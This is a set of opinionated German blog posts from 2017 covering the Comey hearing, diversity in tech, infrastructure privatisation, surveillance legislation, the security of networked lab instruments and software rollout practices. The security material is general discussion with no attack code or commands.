Das Tragischste daran ist ja, dass sie ja inhaltlich Recht haben könnten. Das könnte ja alles sein, was sie da behaupten. Es ist nur so unglaubwürdig präsentiert, und sie haben so wenig versucht, auch die Gegenseite zu Wort kommen zu lassen, dass sie ihre eigene Glaubwürdigkeit damit zerschossen haben. Ich für meinen Teil warte dann mal auf die nächste Dokumentation, die hoffentlich besser ist. Ich verstehe jedenfalls, wieso arte das nicht ausstrahlen wollte. Von Skandinavien und Ungarn war weit und breit nichts zu sehen. Ich hätte ihn aber trotzdem gezeigt. Diesen Streisand-Effekt hätte man nicht mitnehmen müssen.
Update: Ein bisschen bedauerlich ist auch, dass das einzige echte Beispiel in Europa mit Betroffenen-Befragen in Frankreich war, von einer deutschen Produktion. Das hat ja ein bisschen ein Geschmäckle, so ala "in Deutschland ist alles super, daher mussten wir nach Frankreich gehen".
Update: Money Quote des Mitautors des Films:
"Völlig überrascht"zeigt sich auch Mitautor Joachim Schroeder. Ihn beschäftige vor allem eine Frage: "Warum ist unser Film gut genug für ein Massenmedium wie Bild, aber nicht für den WDR und Arte?"
Au weia.
Update: Zapp hat dazu einen Beitrag gemacht, hier noch ein Interview dazu.

Sat Jun 10 2017

[l] Hatte Trump nicht getweetet, er habe Tapes von den Comey-Meetings gemacht? Das House Intelligence Committee will sehen!
Dann noch zwei Kurzmeldungen: Der Israelische Botschafter hat gemerkt, wie er Trump motiviert kriegt.
"If there's a president who wants to be remembered for 2,000 years, move the embassy to Jerusalem," Ron Dermer, Israeli ambassador to US.
Die US-Botschaft in Israel ist im Moment in Tel Aviv, aber Trump hatte angesagt, er wolle sie nach Jerusalem ziehen. Dann zog er das gleich wieder zurück.
Lacher am Rande: Trumps Anwalt wollte nach seinem Statement keine Pressefragen zulassen und floh in den Fahrstuhl. Dort vergaß er dann aber, den Knopf zu drücken, und so gab es da ein paar peinliche Momente :-)

Thu Jun 8 2017

[l] Die Comey-Anhörung läuft jetzt schon seit Stunden, und Trump hat noch nichts getweetet. Was ist denn da los? Haben sie ihm das Telefon weggenommen? Internet abgedreht? Die Twitter-App durch einen Dummy ersetzt?
Man merkt dem Comey an, dass er Erfahrung mit Verhören hat. Das perlt alles nur so an dem ab, kein einziges Mal ließ der sich auch nur ein bisschen vorführen, oder es so aussehen, als hätte man ihn auf dem falschen Fuß erwischt. Weia.
Update: Inhaltlich ist das durchaus unterhaltsam. Comey wurde z.B. gefragt, wieso er bei Trump die Notizen gemacht hat, wenn er sie vorher bei anderen nicht gemacht hatte. Und Comey meint so ganz trocken, naja, war wichtig, und seine Persönlichkeit. Wie, seine Persönlichkeit? Na ich musste annehmen, dass er später über den Inhalt des Gesprächs lügen würde. *krawumm*
Ansonsten merkt man, dass der Mann viele Jahre Verhör-Erfahrung hat. Der lässt sich überhaupt gar nicht aus der Ruhe bringen, alles perlt an dem ab. Keine einzige Falle greift. Die Republikaner haben dann auch aufgegeben, seine Person anzugreifen, und fingen an, über Benghazi und die Clinton-Emails zu reden. Alles bloß nicht Trump. Paul Ryan meinte dan, das sei doch gar kein mafiöses Verhalten, was Trump da an den Tag gelegt hat, der sei bloß neu hier und kenne das Protokoll noch nicht so!1!! So verzweifelt sind die.
Übrigens fand ich bemerkenswert, in welchem Maß Comey sich im Amt rückwärts aus dem Fenster gebeugt hat, um Trumps Gesicht zu wahren. Selbst als Trump ihn aufforderte, öffentlich anzusagen, gegen ihn werde nicht ermittelt, hat Comey es nicht getan — weil, wie sich rausstellt, das FBI dann auch offiziell ansagen müsste, wenn sie doch gegen ihn zu ermitteln anfangen. Ich an seiner Stelle hätte da mit Kusshand die Steilvorlage genommen, mir von Trump schriftlich geben lassen, dass er das gerne offiziell angesagt haben möchte, und das dann offiziell angesagt. Ein besseres Szenario als Trump sich selbst Schaden zufügen zu lassen gibt es doch gar nicht, nachdem der sich mir gegenüber wie ein Mafia-Don verhält.
Das andere Zitat, über das die Amis sich gerade ein Loch in den Bauch freuen, ist "Lordy, I hope there are tapes"
Auch ansonsten erweckt Comey den Eindruck, dass er nicht jemand ist, den man sich zum Feind machen will. An einer Stelle sagt er z.B.
if there is evidence of any wrongdoing, I am sure [Sonderermittler im Trump-Russland-Sumpf] Mueller will find it.
Das kann man auch als "ich habe die Sachen genau da hingelegt, wo Mueller als erstes gucken wird" interpretieren.
Zu der offenen Trump-Drohung, es gäbe Tapes der Meetings, meinte er nur so
I hope there are tapes and he turns them over
Denn wenn der Präsident Tapes hat, landen die irgendwann in irgendeinem Archiv und werden öffentlich einsehbar. Ein Einsender kommentiert:
Dass er die Papiere bei einem Law-Prof hinterlegt hat, ist ein echt schicker Trick. Der Typ hat genug Ahnung, dass ihm keiner an den Karren pisst, ist neutral genug, dass es nicht schlecht aussieht, und die Papers sind für das Ermittlungsgremium einsehbar, auch wenn sein Nachfolger beim FBI die Shredder warmlaufen lässt.
Auch die ganzen Fragen, mit denen sie versucht haben, ihn zu Aussagen über Geheimdinge zu bringen, blieben alle erfolglos. Die Senatoren sind ja nicht doof, die fragen das mit Absicht. Um Comey dazu zu bringen, dass er sich strafbar macht, oder zumindest angreifbar, oder dass die Sitzung geschlossen werden muss. Das perlt alles nur so an Comey ab. Der Mann weiß, was er tut.
Update: Was ich ja richtig geil fände: Wenn jetzt die Russen Comey ein Jobangebot machen würden. Es gibt ja diesen alten Spruch: Die Amis spielen Poker, die Russen Schach. Comey hat gezeigt, dass er Schach spielt. Er würde gut passen. Könnte er natürlich nicht annehmen.

Wed Jun 7 2017

[l] Hmm, die Hasskommentar-Ernte bei der Diversity-Frage bleibt hinter den Erwartungen zurück. Da muss ich wohl nochmal nachlegen. :-)
Also erst einmal. In meinem Studium gab es auf 200 Studenten gefühlt 3-4 Frauen. Gleichzeitig hatten die Männer gefühlt 195 Mitläufer und 5 gute Leute. Mit "gute Leute" meine ich jetzt nicht, dass die anderen nicht auch bei T-Systems oder Siemens unterkommen könnten, sondern die Kombination aus "kann was, kann sich Dinge selber beibringen, ist flexibel und zuverlässig, und liefert auffallend gute Ergebnisse ab". Ich habe mir das immer so erklärt, dass man die Mitläufer halt in Kauf nimmt, um die 5 guten Leute pro Jahrgang zu kriegen. Die kommen halt aus dem selben Pool und man erkennt sie nicht sofort. Und hey, viele Handlanger-Tätigkeiten können ja auch von Mitläufern gemacht werden.
Von den 200 Studenten erinnere ich mich heute an ungefähr gleich viele Männer wie Frauen.
Die Zahl 200 habe ich mir jetzt aus dem Arsch gezogen, nagelt mich darauf bitte nicht fest.
Die jetzt vorgeschlagenen Versuche, mehr Vorbilder schaffen, die Wände grün anmalen, mehr weibliche Tutoren, das gab es auch damals alles schon. Wir hatten für meinen Jahrgang bei der einen Pflichtvorlesung 3 Tutorien, eines davon nur für Frauen. Und da saßen am Ende die Hälfte der Frauen drin. Die Veranstalterinnen von dem Tutorium fanden das total super und voll erfolgreich. WELL DUH, ein Tutor pro zwei Studenten, klar ist das produktiver als die anderen Tutorien, wo es eher so ein Tutor pro 20 Studenten waren.
Wenn wir da, ich überspitze mal fies, kostenlose Kosmetika verteilen, um mehr Frauen anzuziehen, dann ziehen wir damit möglicherweise mehr Frauen an, aber das sind dann Mitläufer. Von denen brauchen wir nicht mehr. Im Gegenteil. Eigentlich brauchen wir von denen viel weniger.
Das ist glaube ich der Kern davon, was mich an diesen Diversity-Bemühungen so stört.
Quantität ist nicht Qualität.
Mir ist ein Jahrgang mit einer Frau, die dann die Mondlandung technisch möglich macht, viel lieber, als ein Jahrgang mit 50 Frauen, die dann "Webentwicklung" machen.
Es heißt immer, Frauen sind viel zögerlicher in der Selbsteinschätzung. Das glaube ich gerne. Das ist aber kein Nachteil, im Gegenteil, das ist ein Vorteil. Ich habe schon so viele Projekte scheitern sehen, weil irgendwelche Männer irgendwelchen hanebüchenen Schätzungen einplanen, was man wohl bis wann geschafft haben können wird. Mir ist das viel lieber, wenn Leute realistische Vorstellungen haben, was sie können und was nicht.
Kurz gesagt: Ich möchte auch mehr Frauen haben, aber nicht Füll-Frauen, Dämmmaterial und "damit wir auch mal ein paar hübsche Jahrgangsfotos hier haben"-Frauen, sondern bitte Frauen, die Ansprüche haben — an sich, an ihre Arbeit, an ihre Karriere.
Nerds sind jahrelang unterdrückt und auf dem Schulhof gehänselt worden, teilweise ist ihnen Gewalt angetan worden, sie waren nie cool, niemand hat sie auf gute Parties eingeladen. Sie mussten im Keller D&D und Videospiele spielen. Heute sind Nerds cool und angesehen. Wie haben sie das geschafft? Hint: Nicht durch protestieren, rumheulen und Diversity-Fäkalienstürme auf Twitter. Sie haben es geschafft, indem sie die Bullys ignoriert haben, und coole Scheiße gemacht, coole Dinge gebaut haben. Wenn Frauen den Erfolg der Nerds nachbauen wollen, sollten sie auch ihre Methoden nachbauen. Heult nicht rum, sondern macht coole Scheiße. Wenn ihr gerade nichts zu tun habe, macht coole Open Source-Projekte. Das machen die Männer auch, wenn sie schlau sind. Das ist eure Eintrittskarte in Tech-Jobs.
Nachtrag zu den Frauentutorien: Wenn man Männer in traditionellen Gentlemen-Clubs fragt, ob das gut ist, so ohne Frauen, sagen die auch ja. Wieso ist das sexistische Kackscheiße, aber ein Tutorium nur für Frauen ist Diversity-Förderung? Reicht das vielleicht nicht, dass die Teilnehmer es voll geil finden? Ich bin mir fast sicher, auch Sklavenbesitzer hätten sich in Umfragen positiv geäußert.
Ein Einsender hat mir noch ein paar sehr schöne Punkte gemailt, die ich auch noch bringen möchte:
das große Problem ist, dass Diversität nicht verstanden wird. Einen Wert z.B. als Grundlage von High-Performance Teams, hat Diversität nur dann, wenn es KOGNITIVE Diversität ist.
Scott Page beschreibt dies in „The Difference“ ganz treffend. Nur wenn z.B. bei einem Problem ein Team nicht mehr weiterweiß, senkt z.B. kognitive Diversität die Zeit, bis ein neuer Lösungsansatz gefunden werden kann.
Dies ist auch gut nachvollziehbar:
Der kognitive Unterschied zwischen einem männlichen und weiblichen Maschbauer ist nicht so groß, da beide Jahrelang getrimmt werden, die gleichen Lösungswege, Denkmuster etc. zu übernehmen.
Stehen beide vor einem Problem, wenden Sie die Methoden, Denkmuster und Lösungswege an, für deren Erlernung sie viel investiert haben.
Haben wir einen Geisteswissenschaftler*in und eine Ingenieur*in gleichen Geschlechtes im Team, so ist die kognitive Diversität und die darin gebotene Breite an Lösungswegen einfach höher.
Gründe, warum man dies gerne übersieht, sind mannigfaltig:
- Einige haben nicht die Zeit und Muße, so etwas in Gänze zu durchdringen, haben nur von Diversität gehört und wollen es jetzt auch umsetzen.
- Kognitive Diversität ist unsichtbar. Eine Bildersuche zu „Diversität“ veranschaulicht dies am besten
- Arbeitgeber wollen den Kandidatenpool so breit wie möglich halten.
- HR Hiring-Prozesse sind oft nicht darauf ausgelegt, Individuen in die Köpfe zu kucken, sondern sind oft genug „checkbox basiert“ oder müssen Excel-Kompatibel sein („Skill-Matrix“ *Schauder).
- Kognitive Diversität ist anstrengend, weil man viel Zeit in Kommunikation investieren muss, wenn es beispielsweise um fachliche Lösungswege geht die auch noch miteinander konkurrieren, wohingegen „sichtbare“ Diversität meist im privaten Raum beim Mittagessen oder an der Kaffeemaschine zum Thema wird.
- Das ewige Leid der Lessons Learned und Best Practices ist ein Anpassungsdruck, der kognitive Diversität verdrängt, da man sich mit unkonventionellen Ansätzen oft unbeliebt und angreifbar macht.
Update: "Der Fefe will Mitläufertum bei Männer dulden, bei Frauen nicht"!1!! Nein. Ich habe weder gegen männliche noch gegen weibliche Mittläufer was. Ich sage: Das Ziel von Eingriffen und Fördermaßnahmen sollte sein, am Ende mehr gute Leute zu kriegen, nicht mehr Mitläufer.

Thu Jun 1 2017

[l] Ich hatte ja über die geplante Bundesautobahngesellschaft schon was geschrieben, und das war ja sogar schon in der Anstalt.
Aber das ist ein alter Hut. Mit den Autobahnen laufen die sich doch erst warm.
Nächste Iteration: Schulen.
Doch es geht bei den umfangreichen Grundgesetzänderungen auch um Privatisierungen im Bereich der Bildungsinfrastruktur. Für den Bau und die Sanierung von Schulgebäuden mit privaten Investoren in Form einer Öffentlich-Privaten Partnerschaft (ÖPP) sollen im Rahmen des geplanten Gesetzespakets ebenfalls die Voraussetzungen geschaffen werden.
Das funktionierte so: Der Bund ist pleite, die Länder sind pleite, der Bund will die Autobahnen privatisieren. Die Länder sind dagegen, aber pleite und damit erpressbar. Der Bund gibt den Ländern also ein paar Milliarden, dafür geben die Länder ihren Widerstand auf, und so haben wir jetzt den Salat.
Dieser „Kuhhandel mit dem Grundgesetz“ hat den Weg frei gemacht für ein gigantisches Privatisierungsvorhaben, das den bislang massivsten Ausverkauf der öffentlichen Infrastruktur in Deutschland darstellt.
Ja super!
[l] Wer kauft eigentlich den Wavies ihre "Geräte" ab, die gegen Elektrosmog "helfen"?
In Österreich kann man das gerade gut beobachten:
Die Stadtgemeinde Gerasdorf stattet Kindergärten, Schulen und das Rathaus mit Aufklebern aus, die vor elektromagnetischen Strahlen schützen sollen.
Wie, Moment, Aufkleber? Das ist doch ein Scherz, oder? "Elektrosmog, nein Danke"?
Nein, nein, viel professioneller!1!!
Der Hersteller der Schutzaufkleber beschreibt ihre Wirkung laut Futurezone wie folgt:
Waveex zerlegt die Spitzen (sogenannte Gradienten) zu sanften Verläufen die für unseren Bio-Organismus verträglich und harmonisch sind, womit elektromagnetische Felder für unseren Körper verträglich gemacht werden.
Na dann ist ja alles gut!
Wenn ihr euch jetzt Sorgen macht, ob das möglicherweise vielleicht Charlatanerie ist, dann sorgt euch nicht: Der Hersteller hat Studien, um die Wirksamkeit nachzuweisen. Nein, wirklich! Von einem Wasserspezialisten und einer "i-bmr Dr." (i-bmr ist der Name ihrer "Akademie", die einer "außeruniversitären Forschungseinrichtung" angeschlossen ist. Also wenn das nicht überzeugt, dann weiß ich auch nicht!

Wed May 31 2017

[l] Die Älteren unter euch erinnern sich vielleicht noch daran, dass der Staatstrojaner durch die Hintertür als "Quellen-TKÜ" eingeführt wurde. Aber nur in absolut speziellen Sonderfällen, wenn der Staat an sich gefährdet ist. Terrorismus, Völkermord, sowas. Ja?
Nun, Heiko Maas, wenn er nicht gerade damit beschäftigt ist, Internetzensurinfrastruktur für die nächste Merkel-Durchregierung und deren totalitäre Nachfolger zu schaffen (wir erinnern uns hoffentlich noch alle an das Gefühl, als Obamas Totalüberwachungs- und Drohnenmord-Infrastruktur plötzlich in den Händen von Donald Trump war), dann bereitet er unter höchster Geheimhaltung ein Gesetz vor, das Quellen-TKÜ für den gesamten Straftatenkatalog freischaltet.
Ihr denkt, ich übertreibe? Die Datenschutzbeauftragte des Bundes hat davon aus den Medien erfahren. Und die Medien hatten das, weil Netzpolitik.org das geleakt hat. Sonst wüssten wir da heute noch nicht von.
So, meine Damen und Herren, werden im Maas-Ressort Gesetze gemacht.
Wie macht man so ein Gesetz so, dass das keiner merkt? Gesetze werden doch halbwegs offen diskutiert und vorbereitet, da kann man doch gar nicht wirklich solche Klopper verstecken?
Nun, von Trump lernen heißt siegen lernen! Wie Trump das mit seinem "Gesundheitsgesetz" gemacht hat, so operiert Heiko Maas bei uns. Dieser ganze Scheiß kam über einen Änderungsantrag in letzter Minute dazu, nachdem das Ding im Grunde schon durchverhandelt war. Und so wird das jetzt vermutlich wie bei Trump von Abgeordneten abgestimmt, die das gar nicht gemerkt haben, was ihnen da untergeschoben wurde.
Nana, denkt ihr euch jetzt vielleicht, das ist betimmt ein bedauerlicher Einzelfall und ansonsten ist der Maas nicht so übel. Doch, ist er. Der Einsender erklärt:
Das erinnert an die Frechheit beim netzDG, wo sie den Entwurf den Interessenverbänden geschickt haben mit Deadline für Stellungnahme. Dann haben sie aber einfach weiter an dem Gesetz gearbeitet vor Ablauf der Frist, und alle Stellungahmen waren damit outdated und bezogen sich auf die falsche Version des Gesetzesvorschlags.
Das ist wirklich krass, was bei Maas abgeht. Das würde man Trump nicht durchgehen lassen.
Die beste Demokratie, die man für Geld kaufen kann!

Wed May 24 2017

[l] Sascha Lobo zu "wir brauchen mehr Überwachung gegen die Terroristen". Er listet da, was jetzt schon geht und gemacht wird. Reicht das mal an die weiter, die nach Manchester mehr Überwachung fordern.

Tue May 23 2017

[l] Auf Stack Overflow kam heute der millionste Hit auf die Frage, wie man Vim verlässt. Und sie haben diesen wunderschönen Blogpost gemacht, richtig mit einer Aufschlüsselung, aus welchen Ländern die Leute kommen, die das fragen, und wieviel Prozent des Vim-Fragen-Traffics das ausmacht, in Abhängigkeit von der Programmiersprache. Ich spoiler mal: jquery-Programmierer aus der Ukraine das größte Problem damit, vim zu verlassen.

Sat May 20 2017

[l] Wenn ich mich mit Bloglesern unterhalte, kommt es häufig zu so Äußerungen wie "wie hälst du das nur alles aus" und "was kann man denn überhaupt machen". Ich finde es gefährlich, wenn man alle Dinge für unwirksam hält, die nicht gleich Auswirkungen auf globaler Ebene haben. Man muss eben tun, was man innerhalb seinem Aktionsradius machen kann.
Aber manchmal gibt es Ausnahmen. Da geht jemand los und tut etwas, das auch außerhalb des normalen Aktionsradius von einer Person Auswirkungen haben kann. Wir hatten auf dem 33c3 eine Filmvorführung von "National Bird", das war sowas. Eine vergleichsweise zierliche Journalistin, die vorher als Korrespondentin für NDR und CNN gearbeitet hat, hat sich eines Tages entschieden, dass sie die Drohnenmorde nicht mehr hinnehmen will. Sie hat sich eine US-Soldatin genommen, und ist mit der einfach so in die Drohnenmordgebiete in Afghanistan gegangen. Mehrere Whistleblower kommen zu Wort, und nach allen Kommentaren zu dem Film zu urteilen ist das ein zeitgenössisches Meisterwerk, eine Sache, bei der jeder von uns als erstes denkt: Whoa, die hat mal was gemacht! Geil!
Und der Film gammelt da jetzt in der Obskurität herum, lief auf ein paar Filmfestivals. Das mindeste, was wir jetzt alle machen können, ist dafür sorgen, dass sie dieses krasse Risiko nicht umsonst eingegangen ist. Sie und die Whistleblower natürlich. Ich will jetzt nicht ausführen, was ich gehört habe, was die für Drohungen ausgesetzt sind, das könnt ihr euch ja selber denken.
Jedenfalls, wer den Film sehen möchte, und dazu möchte ich alle Leser ausdrücklich aufrufen, der kann das in einigen Kinos im Lande tun. Viel weniger als ich gehofft hätte, aber hey, immerhin. Man kann, wenn man will. Ihr solltet die Chance nutzen.
Update: Tilo Jung hat Sonia Kennebeck zum Film interviewt.

Thu May 18 2017

[l] Habt ihr noch nicht genug Security-Apokalypse?
Noch ein zartes Pflänzchen der Hoffnung übrig?
Dem kann ich anhelfen. Ein Leserbrief kam noch rein.
eine kurze Anmerkung zum Laboralltag. Fefe meinte im Blog
```
> Man hörte in letzter Zeit häufiger von irgendwelchen Spektroskopen an
> Unis, von Steuersoftware für Großmaschinen. Na dann hängt die halt
> nicht ans Netz.
```
Dann sind die Dinger für uns ziemlich nutzlos. Diese Dinger dienen dazu Daten zu sammeln und an andere Computer weiterzuleiten… zur weiteren Auswertung, entweder später, oder sogar unmittelbar zur Prozesssteuerung.
Meßgeräte waren mit so ziemlich die erste Geräteklasse die eine Form von echter Vernetzung implementierten. Späte 1960er, IEEE-488/GPIB, ein Multi-Master-fähiger Bus. Da drüber fährt man üblicherweise ein ziemlich rustikales Protokoll (SCPI) das eigentlich auf OOB-Signaling für Fehler angewiesen ist.
Mittlerweile haben die Kisten alle IP und üblicherweise schickt man SCPI über einen unauthentifizierten, offenen TCP-Stream. Klar könnte man da ein TLS drüber stülpen. Aber die Leute die Meßgeräte verwenden, wollen die üblicherweise mit LabVIEW ansteuern (ein übelstes Stück Software dessen Update-Prozess mit Leichtigkeit jedes andere Produkt da draussen in Sachen Beschissenheit überbietet).
```
> Wenn die Funktionalität ohne Netzzugang nicht nutzbar ist,
```
Die Dinger funktionieren wunderbar ohne Zugang zum Internet. Wenn man sich irgendwelchen DRM-Mist ans Bein binden will, dann läuft das in diesem Marksegment üblicherweise per SmartCards. Irgendwo innen drinnen gibt es einen Slot für eine SmartCard im SIM-Karten-Format, da tut der Hersteller eine Lizenzkarte rein und die regelt das.
Aber so richtig vom Internet abschotten kann man sie auch nicht. Das Problem mit internen Netzwerken und Firewalls habt ihr ja in Alternativlos 39 angesprochen. Und es ist nun mal sehr oft so, dass man die Dinger in einem internen Labornetz stehen hat, das aber über eine Firewall mit dem normalen Büronetz verbunden ist, damit man per Remote-Desktop nach dem Rechten sehen kann. Und natürlich auch, weil man auf den Geräten auch seine eigenen Programme laufen lassen kann, die man natürlich nicht auf den Geräten selber speichert, sondern auf einem zentralen Server. D.h. SMB ist üblicherweise auch notwendig, damit man vernünftig damit arbeiten kann.
Richtig krass ist es an Teilchenbeschleunigern. Da wird das Experiment aufgebaut, aber Strahlzeit bekommt man meistens erst viel später. Da sind einige Leute darauf angewiesen sich, teilweise vom anderen Ende der Welt, irgendwie Remote mit dem Experiment verbinden zu können um den Leuten vor Ort entweder mit Rat beiseite zu stehen, oder direkt Daten aufzunehmen. Das WWW (also HTTP) wurde nicht durch Zufall am CERN erfunden.
Oder man nehme Radioastronomie. Da werden Experimente einmal quer über den Erdball miteinander verschaltet; die Daten werden lokal aufgezeichnet, mit GPS-Timestamps versehen, aber die Steuerung erfolgt über das Internet.
Computer-Netzwerke waren schon immer lebensnotwendig für Experimentatoren.
```
> dann hättet ihr die halt nicht kaufen dürfen, ohne euch zu
> versichern, dass da für Sicherheit gesorgt ist.
```
Meßgeräte haben die Eigenschaft, dass sie üblicherweise sehr langliebig sind. In vielen Labors findet man Geräte die 15 Jahre oder älter sind. So lange die Hardware noch funktioniert gibt es einfach keinen Grund die auszutauschen.
Nimm zum Beispiel mal das DPO7104 das auf Windows-XP läuft. Das wurde, wenn ich mich recht erinnere, irgendwann so um 2005 herum angeschafft. Zu diesem Zeitpunkt war Vista noch Longhorn. Wenn man da den Hersteller fragt "Wie sieht es mit Updates aus?", kommt als Anwtort "das müssen sie Microsoft fragen."
Als wir letztes Jahr das LeCroy und das Keysight angeschafft haben war einer der entscheidenden Punkte im Anforderungs-Katalog der Ausschreibung, wie denn die Software-Wartungs-Strategie bezüglich Betriebssystem-Updates und dadurch bedingt notwendiger Anpassungen aussieht. Einer der Anbieter hat sich mit folgender Aussage komplett disqualifiziert:
"Falls das System durch Software-Update unbenutzbar wird, kann es mittels dem Acronis-Recovery-Image auf dem System in den Fabrikzustand zurückgesetzt werden." — Themaverfehlung, setzen, 6.
Von zwei anderen Herstellern weiß ich, dass denen Windows-10 die Haarpracht schon ins Mithrandir-Weiß hat ergrauen lassen. Die sind echt nicht "ammused" von dem was Microsoft da fährt. Andererseits können die auch nicht einfach auf Linux oder FreeBSD wechseln, weil um diese Geräte ein regelrechtes Ökosystem aus Ranzsoftware existiert, die nur auf Windows läuft: Matlab, LabVIEW (dafür gibt es zwar eine Linux-Version, aber die ist echt übel), Origin, usw.. Und die Leute wollen auch in 10 Jahren weiterhin ihre Legacy-Software verwenden können.
Ich denke Microsoft wird in den nächsten Jahren der komplette Embedded- und Meßgeräte-Markt wegbrechen. Microsoft wird es nicht jucken. Mit Konsumenten verdient man Geld, nicht mit wenigen großen Fischen.
Ein generelles Problem, gerade was Security und Updates angeht ist, dass diese Geräte auch oft in Langzeitexperimenten stehen die über Wochen oder Monate kontinuierlich Daten aufnehmen sollen. Wenn da ein automatisierter Updateprozess die Kiste unvermittelt herunterfährt, oder sonstigen Mist macht kann das ziemlich schlecht sein. Deshalb sind die automatischen Updates aus solchen Geräten üblicherweise ausgeschaltet.
Was die Sache mit den Treiber-Signaturen angeht und dass man das doch alles sicher portieren könne, das Treibermodell habe sich ja nicht geändert. Nun, teilweise machen die Hersteller von diesen Kisten echt schräges Zeug auf der Hardware-Ebene — Elektroingenieure halt — die auf der Software-Seite zu echt üblen Hacks führen.
Nimm z.B. mal diese Tektronix-DPO-Scopes. Ein Manko das digitale Speicheroszilloskope lange hatten war, dass diese mit Frequenz-Aliasing nicht gut umgehen konnten. Bei analogen Oszis verschmiert einfach nur der Elektronenstrahl auf dem Bildschirm, aber Digitale haben da lange Zeit einfach nur Signal-Müll angezeigt und so getan als wäre das richtig.
Tektronix hat sich dann gedacht: Hey, emulieren wir doch einfach den Elektronenstrahl. Dazu haben die dem Oszi einen zweiten Graphik-Chip (von ATI) eingebaut in dessen Speicher dann die Datenerfassunghardware direkt Pixelwerte hineinmanipuliert. Und dieser Speicher hängt dann irgendwie elektrisch an dem Speicher vom Hauptgraphik-Chip dran. Und entsprechend genau dafür ist die Software ausgelegt. Nun ist das Treibermodell für Graphik-Hardware einer der Teile von Windows der sich schon mehrmals geändert hat. Nicht unbedingt das was im Kernel passiert und auch das Userland ist recht konstant, aber die Schnittstelle zwischen Kernel- und Userland. Und diese Tektronix-DPO-Scopes haben sich das mitten hineingesetzt und wollen eine bestimmte API sehen. Nebeneffekt: Das Programm von denen ist knallhart auf XGA-Auflösung festgenagelt.
Keysight und LeCroy haben solchen Mist zum Glück nie gemacht. Und diese beiden Kisten haben sich auch problemlos updaten lassen. Die Tektronix-Scopes dagegen erfordern echt finsteres Voodoo; der XP-Patch von Microsoft funktioniert nur für SP3, aber das alte Tektronix-Teil verträgt kein SP3. Ich bleibe am Ball.
Was gesetzliche Regelungen angeht: Ich vertrete schon seit Jahren die Ansicht, dass Hersteller im Rahmen der Produkthaftung dazu verdonnert werden sollten für Produkte für die es offiziell keinen Support mehr gibt alle Source-Codes und Hardware-Programmier-Informationen herauszurücken. Keine Diskussion. Falls die Hersteller das nicht wollen, müssen sie halt langfristig Software-Support auf dem aktuellen Stand der Technik anbieten.
Der Fall, dass durch Insolvenz eines Herstellers dies nicht gegeben ist, ist denkbar gering. Die Zahl an relevanten Firmen im Meßgerätebereich kann man an 3 Fingern abzählen (binär) und sind auch Zulieferer für die Rüstung, dass die nicht so schnell verschwinden.
Wobei, Tektronix würde ich keine Träne nachweinen. Früher haben die echt geile analoge Oszilloskope gebaut, aber deren Digital-Scopes waren eigentlich immer eher so "meh". Die DPOs so von vor ca. 15 Jahren waren mal kurzzeitig cool, aber die dümpeln jetzt wieder so vor sich rum.

Wed May 17 2017

[l] OK, das wird mir jetzt hier gerade zu krass. Besonders niederschmetternd war ein Leserbrief zu Alternativlos 39 aus einem Elektronik-KMU vom Lande, der da die Apokalypse grafisch beschrieben hat, und dann am Schluss meinte, ich solle das bitte nicht ins Blog tun, das könne man rückverfolgen. Nachdem er als Sahnehäubchen erwähnte, dass die Firma ja jetzt IOT-Geräte bauen will.
Daher jetzt auch mal was Konstruktives. Eine Einsendung von Kris Köhntopp, wie man Rollout und Testing richtig macht.
Victim Blaming: »Patching is hard? Yes—and every major tech player, no matter how sophisticated they are, has had catastrophic failures when they tried to change something. Google once bricked Chromebooks with an update. A Facebook configuration change took the site offline for 2.5 hours. Microsoft ruined network configuration and partially bricked some computers; even their newest patch isn't trouble-free. An iOS update from Apple bricked some iPad Pros. Even Amazon knocked AWS off the air.«
Wo ich arbeite haben wir dieselbe Beobachtung gemacht. Wir haben ein Outage Budget, d.h. wir messen die tatsächlichen Einnahmen und vergleichen mit den vorhergesagten Einnahmen. Ist durch einen mißglückten Rollout ein Einnahmeausfall zu verzeichnen, buchen wir das vom Outage Budget ab.
Wir versuchen das so gut als möglich zu treffen. Wenn wir mehr Outage als geplant haben, ist das zu viel Risk Taking, wenn wir zu wenig Outage hatten, ist das nicht genug Risk Taking und wir sind zu langsam und complacent.
Häufige Rollouts sind kleine Changes und die sind viel besser zu kontrollieren als große unübersichtliche Changes. Daher versuchen wir, so oft als möglich einen Rollout (== Patch) zu machen und so die Patches möglichst klein zu halten.
Wenn wir Rollout-Probleme haben, dann meist in den Subsystemen, die wir nicht oft genug ausrollen und in denen dann sekundäre Changes (== Library Changes, die mit sich schneller ändernden Systemen geteilt werden) den Rollout zerknallen. Die Lösung ist für uns, so was auch dann auszurollen wenn sich im Code selbst nix geändert hat (also Dependency-Änderungen auszurollen).
Alles in allem ist das eine sehr anschauliche Darstellung von Technical Debt: Je größer der Diff zwischen ausgerollt und trunk ist, um zu wahrscheinlicher ist es, daß Trunk in Production explodiert.
Um Patching sicher zu machen, muß man es oft tun.
Wenn man oft patchen möchte, müssen Patches und deren Rollouts ein Operativer Prozeß und kein Upgrade-Migrationsprojekt sein.
Wenn Rollouts ein operative Prozeß sein sollen, dann muß man Testen in der Produktion sicher und überlebbar machen.
Um Testen in der Produktion sicher zu machen, muß man:
- das Austeilen von Code und die Aktivierung von Code trennen, also Feature Flags und Experiments einführen,
- sich ändernde persistente Datenstrukturen doppelt führen (alte und neue Version gleichzeitig und parallel aktualisieren, sodaß alter und neuer Code coexistieren können).
- Reporting und Monitoring exzessiv ausbauen und den Monitoring Lag (Event Timestamp vs. Timestamp in dem das Event im Monitoring auf dem Operator Screen sichtbar wird) mitloggen und Anzeigen ("Monitoring Framerate einblenden")
- und den Leuten klar machen, daß es wichtig ist, eine Fehlerkultur zu etablieren ("blameless postmortem" einführen und durchsetzen).
- Canaries
- Overcapacity
- nur 2 Versionen aktiv zur Zeit (also nicht drei- oder mehrphasige Rollouts laufen haben)
Alles kein Hexenwerk eigentlich.
Ein Canary ist ein Kanarienvogel im Kohleminen-Sinn. Man schiebt die neue Version nicht gleich auf das ganze Rechenzentrum, sondern erstmal nur auf ein paar Kisten, und da routet man nur ein paar User hin. Und guckt, ob es platzt. Das ist an sich eine gute Praxis, aber man muss aufpassen, dass man das nur kurzzeitig macht. Ich habe schon Firmen gesehen, die praktisch permanent diverse Versionen parallel ausgerollt hatten. Das ist nicht gut.
Overcapacity heißt einfach, dass man nicht am Limit fährt mit seiner Hardware, damit man eine Performance-Regression zur Not mal kurzzeitig abfangen kann.
Stört euch bitte nicht an dem Denglisch, das ist in der Ops-Abteilung von internationalen Firmen durchaus normal :-)
Update: Kris hat das auch in sein Blog getan und verlinkt dort auch ein paar Vorträge, die er in dem Bereich gehalten hat.
